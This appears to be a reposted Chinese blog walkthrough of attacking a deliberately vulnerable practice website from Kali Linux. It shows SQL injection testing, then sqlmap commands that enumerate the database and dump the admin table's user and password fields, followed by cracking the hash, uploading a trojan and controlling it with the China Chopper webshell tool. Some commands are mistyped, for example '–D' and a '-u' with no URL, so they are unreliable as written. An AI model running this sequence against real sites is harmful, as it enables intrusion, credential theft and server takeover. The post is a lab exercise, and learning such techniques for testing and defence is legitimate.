不安全!一个kali,分分钟钟搞死你!

笔记 - Linux - Kail Linux 实战

发布时间:2016-08-22 00:00:00

admin 于  2021-07-26 16:30:26 编辑

1.配置环境

(1)准备说明

phpstudy+带有漏洞的网站+kali工具一套+跑后台软件


(2)网站账户名密码简单设置(证明后期操作结果)



admin/admin

(3)网站架设成功




2.开始搞

(1)搜集信息



端口信息



服务器信息



后台信息




(2)注入点查找

野蛮点击,看见id进行1=1和1=2测试,不一致直接扔到kali,利用命令sqlmap -u http://test.com --dbs 读数据库,结果当然失败,因为那个链接不存在注入,继续找,想了想,还是上工具吧。











(3)直接扔到sqlmap进行跑

这里进行个总体说明。

// 说明:这里写相关的sqlmap命令行入侵等内容(1)使用sqlmap注入检查命令进行验证sqlmap -u "http://www.test.com/?r=content&cid=15" (2)获取当前数据库名称
sqlmap -u http://www.test.com/?r=content&cid=15 –-current-db(3)获取当前数据库用户
sqlmap -u http://www.test.com/?r=content&cid=15 --current-user(4)获取数据库所有表
sqlmap -u http://www.test.com/?r=content&cid=15 –D seacms --tables(5)查看表中的字段
sqlmap -u http://www.test.com/?r=content&cid=15 –D seacms -T manage -- column(6)导出字段的值
sqlmap -u -D "seacms" -T manage -C user,password --dump(7)最后将密文解密,就得到了管理员密码



具体内容截图




得到数据库名称



数据库所有表

经过脚指头分析,manager表里面很大可能有管理员账户和密码,接下来我们跑它。



看见没有,这几个字段里面必定有信息,接下来只跑user和password字段值。



现在账户密码有了,再把密文解密下。




可以登录后台并且上传木马了。。。。






菜刀来一把——



来看看权限,不得不说一句,菜刀牛皮.......





https://zhuanlan.zhihu.com/p/75998632

转载声明:本站文章无特别说明,皆为原创,版权所有,转载请注明:Dy大叔的日常

转载自 不安全!一个kali,分分钟钟搞死你! | XDY.ME@Dy大叔的日常

XDY.ME@Dy大叔的日常